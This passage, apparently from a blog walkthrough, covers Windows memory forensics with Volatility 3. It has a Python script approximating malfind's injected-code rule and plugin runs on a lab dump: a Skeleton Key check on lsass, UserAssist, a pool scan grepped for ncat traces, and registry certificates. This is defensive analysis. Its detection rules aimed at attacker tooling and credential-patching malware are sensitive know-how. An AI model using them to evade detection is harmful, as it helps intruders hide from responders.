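    if not ("EXECUTE" in prot and "WRITE" in prot):
        return False                      # read-only or non-executable: never flagged
    if vad["commit"] == 0:
        return False                      # stand-in for the plugin's empty-page check
    if vad["private"] == 1:
        return vad["tag"] == "VadS"       # private RWX memory with no backing file
    return prot != "PAGE_EXECUTE_WRITECOPY"   # mapped images are normally WRITECOPY


def malfind_hits(rows: list) -> list:
    return [(v["start"], v["end"], v["protection"]) for v in rows if is_malfind_hit(v)]


def parse_hexdump(text: str) -> bytes:
    out = bytearray()
    for line in text.splitlines():
        out += bytes(int(tok, 16) for tok in line.split()[:8])
    return bytes(out)


def triage_region(data: bytes) -> dict:
    """Cheap first look at a flagged region: PE header present? wide strings?"""
    wide = [m.decode("utf-16-le") for m in re.findall(rb"(?:[\x20-\x7e]\x00){4,}", data)]
    return {"has_mz_header": data[:2] == b"MZ", "wide_strings": wide}


if __name__ == "__main__":
    print("hits:", malfind_hits(parse_vadinfo(VADINFO_ROWS)))
    print("triage:", triage_region(parse_hexdump(MALFIND_HEXDUMP)))
```

Running the rule over the full vadinfo table for every process reproduces malfind's candidate list; the triage step then tells you in seconds whether a hit is a dropped PE, a string table, or a few bytes of trampoline that call into a known module.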

Testing for a Skeleton Key. The plugin checks, inside lsass.exe, whether the Kerberos RC4-HMAC routines rc4HmacInitialize and rc4HmacDecrypt still point into cryptdll.dll or have been patched to point somewhere else; "False" means no patch was found. The check matters on a domain controller, which is what that malware targets; on a workstation like this one a False is expected.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.skeleton_key_check.Skeleton_Key_Check
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
PID     Process Skeleton Key Found      rc4HmacInitialize       rc4HmacDecrypt

612     lsass.exe          False          0x7ffe279d63c0        0x7ffe279d6800

Peeking into UserAssist, the Explorer registry keys that count GUI launches of programs (value names are stored ROT13-encoded; the plugin decodes them). The {CEBFF5CD-ACE2-4F4F-9178-9926F41749EA} subkey is the one that records executable launches, and its last write time of 2022-02-25 18:21:12, about a minute before the dump, fits the ncat activity being examined.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.registry.userassist.UserAssist | more                                    
Volatility 3 Framework 2.0.2    PDB scanning finished                                

Hive Offset     Hive Name       Path    Last Write Time Type    Name    ID      Count   Focus Count     Time Focused    Last Updated    Raw Data

0xe50a50363000  hive0xe50a50363000      -       -       -       -       -       -       -       -       -       -
0xe50a5048a000  hive0xe50a5048a000      -       -       -       -       -       -       -       -       -       -
0xe50a53827000  \??\C:\Users\SecurityNik\ntuser.dat     ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{9E04CAB2-CC14-11DF-BB8C-A2F1DED72085}\Count        2021-12-23 15:09:55.000000      Key     N/A     N/A     N/A     N/A     N/A     N/A     N/A
0xe50a53827000  \??\C:\Users\SecurityNik\ntuser.dat     ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{A3D53349-6E61-4557-8FC7-0028EDCEEBF6}\Count        2021-12-23 15:09:55.000000      Key     N/A     N/A     N/A     N/A     N/A     N/A     N/A
0xe50a53827000  \??\C:\Users\SecurityNik\ntuser.dat     ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{B267E3AD-A825-4A09-82B9-EEC22AA3B847}\Count        2021-12-23 15:09:55.000000      Key     N/A     N/A     N/A     N/A     N/A     N/A     N/A
0xe50a53827000  \??\C:\Users\SecurityNik\ntuser.dat     ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{BCB48336-4DDD-48FF-BB0B-D3190DACB3E2}\Count        2021-12-23 15:09:55.000000      Key     N/A     N/A     N/A     N/A     N/A     N/A     N/A
0xe50a53827000  \??\C:\Users\SecurityNik\ntuser.dat     ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CAA59E3C-4792-41A5-9909-6A6A8D32490E}\Count        2021-12-23 15:09:55.000000      Key     N/A     N/A     N/A     N/A     N/A     N/A     N/A
0xe50a53827000  \??\C:\Users\SecurityNik\ntuser.dat     ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count        2022-02-25 18:21:12.000000      Key     N/A     N/A     N/A     N/A     N/A     N/A     N/A
* 0xe50a53827000        \??\C:\Users\SecurityNik\ntuser.dat     ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count        2022-02-25 18:21:12.000000      Value   UEME_CTLCUACount:ctor   N/A     0       0       0:00:00.500000       N/A
ff ff ff ff 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 80 bf 00 00 80 bf ........
00 00 80 bf 00 00 80 bf ........
00 00 80 bf 00 00 80 bf ........
00 00 80 bf 00 00 80 bf ........
00 00 80 bf 00 00 80 bf ........
ff ff ff ff 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
...

Leveraging the pool scanner plugin, which locates kernel objects by their pool tag instead of walking linked lists, so it can also surface processes and file objects that have been unlinked or closed. Two _EPROCESS objects named ncat.exe turn up, matching the two ncat processes (PID 4260 holds a handle to PID 4500 in the handles output above), along with the file objects for the two ncat.exe binaries, the ncat-0 named pipe and two Prefetch files. Two different .pf hashes means ncat.exe was executed from two different paths.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.poolscanner.PoolScanner | grep -i ncat
symbol_table_name1!_EPROCESS    0xd187c11a5000  layer_name      ncat.exe
symbol_table_name1!_FILE_OBJECT 0xd187c14adcf0  layer_name      \ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe
symbol_table_name1!_EPROCESS    0xd187c1af3000  layer_name      ncat.exe
symbol_table_name1!_FILE_OBJECT 0xd187c1e11b60  layer_name      \ProgramData\chocolatey\bin\ncat.exe
symbol_table_name1!_FILE_OBJECT 0xd187c1e27960  layer_name      \Windows\Prefetch\NCAT.EXE-4B4B887F.pf
symbol_table_name1!_FILE_OBJECT 0xd187c1e2a200  layer_name      \ProgramData\chocolatey\bin\ncat.exe
symbol_table_name1!_FILE_OBJECT 0xd187c1e326d0  layer_name      \Windows\Prefetch\NCAT.EXE-1B3976EF.pf
symbol_table_name1!_FILE_OBJECT 0xd187c1e347a0  layer_name      \ncat-0
symbol_table_name1!_FILE_OBJECT 0xd187c1e34930  layer_name      \ncat-0

Extracting certificate information from the registry hives. AuthRoot is the store of third-party roots that Windows fetches through its root-certificate auto-update; the rows whose ID reads AutoUpdate are the control values under AuthRoot\AutoUpdate rather than certificates, and the 40-hex-digit IDs are SHA-1 thumbprints. A root CA installed by hand, which is what an attacker intercepting TLS would add, lands in the Root section rather than here, so that part of the output is the one to compare against a known-good build.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.registry.certificates.Certificates | more                                        
Volatility 3 Framework 2.0.2    PDB scanning finished                                

Certificate path        Certificate section     Certificate ID  Certificate name

Microsoft\SystemCertificates    AuthRoot        AutoUpdate      -
Microsoft\SystemCertificates    AuthRoot        AutoUpdate      -
Microsoft\SystemCertificates    AuthRoot        AutoUpdate      -
Microsoft\SystemCertificates    AuthRoot        AutoUpdate      -
Microsoft\SystemCertificates    AuthRoot        AutoUpdate      -
Microsoft\SystemCertificates    AuthRoot        AutoUpdate      -
Microsoft\SystemCertificates    AuthRoot        AutoUpdate      -
Microsoft\SystemCertificates    AuthRoot        AutoUpdate      -
Microsoft\SystemCertificates    AuthRoot        02FAF3E291435468607857694DF5E45B68851868        Sectigo (AddTrust)
Microsoft\SystemCertificates    AuthRoot        0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43        DigiCert
Microsoft\SystemCertificates    AuthRoot        07E032E020B72C3F192F0628A2593A19A70F069E        Certum Trusted Network CA
Microsoft\SystemCertificates    AuthRoot        2796BAE63F1801E277261BA0D77770028F20EEE4        Go Daddy Class 2 Certification Authority
Microsoft\SystemCertificates    AuthRoot        2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E        Sectigo
Microsoft\SystemCertificates    AuthRoot        3679CA35668772304D30A5FB873B0FA77BB70D54        VeriSign Universal Root Certification Authority

Good enough for me at this point. I have a good enough understanding of how to use Volatility3.
